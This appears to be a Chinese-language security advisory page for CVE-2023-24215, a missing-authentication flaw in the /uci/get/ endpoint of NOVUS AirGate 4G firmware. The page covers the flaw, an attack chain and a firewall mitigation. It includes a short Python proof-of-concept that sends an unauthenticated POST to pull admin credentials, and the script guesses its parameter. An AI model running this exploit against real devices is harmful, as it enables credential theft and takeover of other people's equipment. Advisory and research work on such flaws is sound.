CVE-2023-24215 CVSS 9.1 严重

CVE-2023-24215 NOVUS AirGate 4G访问控制漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-24215

漏洞类型

访问控制失效

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NOVUS AirGate 4G

漏洞概述

NOVUS AirGate 4G 固件 v1.1.16 版本中的 /uci/get/ 端点存在严重的访问控制缺陷。由于缺乏适当的身份验证机制，未经授权的远程攻击者可以通过构造特殊的 POST 请求，直接访问该敏感接口。成功利用此漏洞可导致管理员凭据泄露，攻击者可利用这些凭据获取设备最高权限，完全控制设备，造成严重的安全风险。

技术细节

该漏洞的根本原因在于 NOVUS AirGate 4G 设备的 Web 管理接口对 /uci/get/ 端点实施了不正确的访问控制策略。UCI（Unified Configuration Interface）通常用于读写设备配置，理应受到严格的权限保护。在受影响版本中，系统未能正确验证向 /uci/get/ 发送 POST 请求的客户端身份。

攻击者利用这一缺陷，无需经过身份验证，即可向目标设备发送特制的 HTTP POST 请求。该请求能够绕过安全检查，直接调用系统底层接口获取敏感配置信息。由于配置文件中可能明文存储或加密较弱地存储了管理员凭证，攻击者通过解析响应数据即可获取设备的最高管理权限凭据。此外，CVSS 向量显示完整性影响为高，暗示攻击者可能通过类似机制篡改设备配置，导致设备完全被控。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别目标 NOVUS AirGate 4G 设备的 IP 地址及开放的 Web 服务端口。

STEP 2

2. 漏洞利用

攻击者向目标设备的 /uci/get/ 端点发送未经身份验证的恶意 POST 请求，尝试触发访问控制缺陷。

STEP 3

3. 凭据获取

设备响应请求，返回包含管理员用户名和密码的敏感配置文件数据。

STEP 4

4. 系统控制

攻击者利用获取到的管理员凭据登录 Web 管理界面，进而完全控制设备或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_novus_airgate(target_ip):
    # Target endpoint vulnerable to incorrect access control
    url = f"http://{target_ip}/uci/get/"

    # Headers to mimic a legitimate browser request
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }

    # Payload to retrieve sensitive configuration (admin credentials)
    # The specific parameter might vary based on UCI structure, often requesting config files like 'system' or 'admin'
    payload = {
        "config": "system"
    }

    try:
        # Sending POST request without authentication
        response = requests.post(url, headers=headers, data=payload, verify=False, timeout=5)

        if response.status_code == 200:
            print("[+] Exploit successful!")
            print("[+] Retrieved response:")
            print(response.text)
        else:
            print(f"[-] Failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with target IP
    exploit_novus_airgate(target)

影响范围

NOVUS AirGate 4G v1.1.16

防御指南

临时缓解措施

如果无法立即升级固件，建议通过网络防火墙或 ACL 规则，严格限制仅信任的 IP 地址才能访问设备的 Web 管理端口（通常为 80 或 443 端口），并定期检查设备日志是否存在异常的 /uci/get/ 访问记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2023-24215
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2023-24215
3 Details https://www.cvedetails.com/cve/CVE-2023-24215/
4 VulDB https://vuldb.com/cve/CVE-2023-24215
5 Link http://airgate.com
6 Link http://novus.com
7 Link https://github.com/sql3t0/cve-disclosures/blob/main/00_-_CVE-2023-24215.md

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表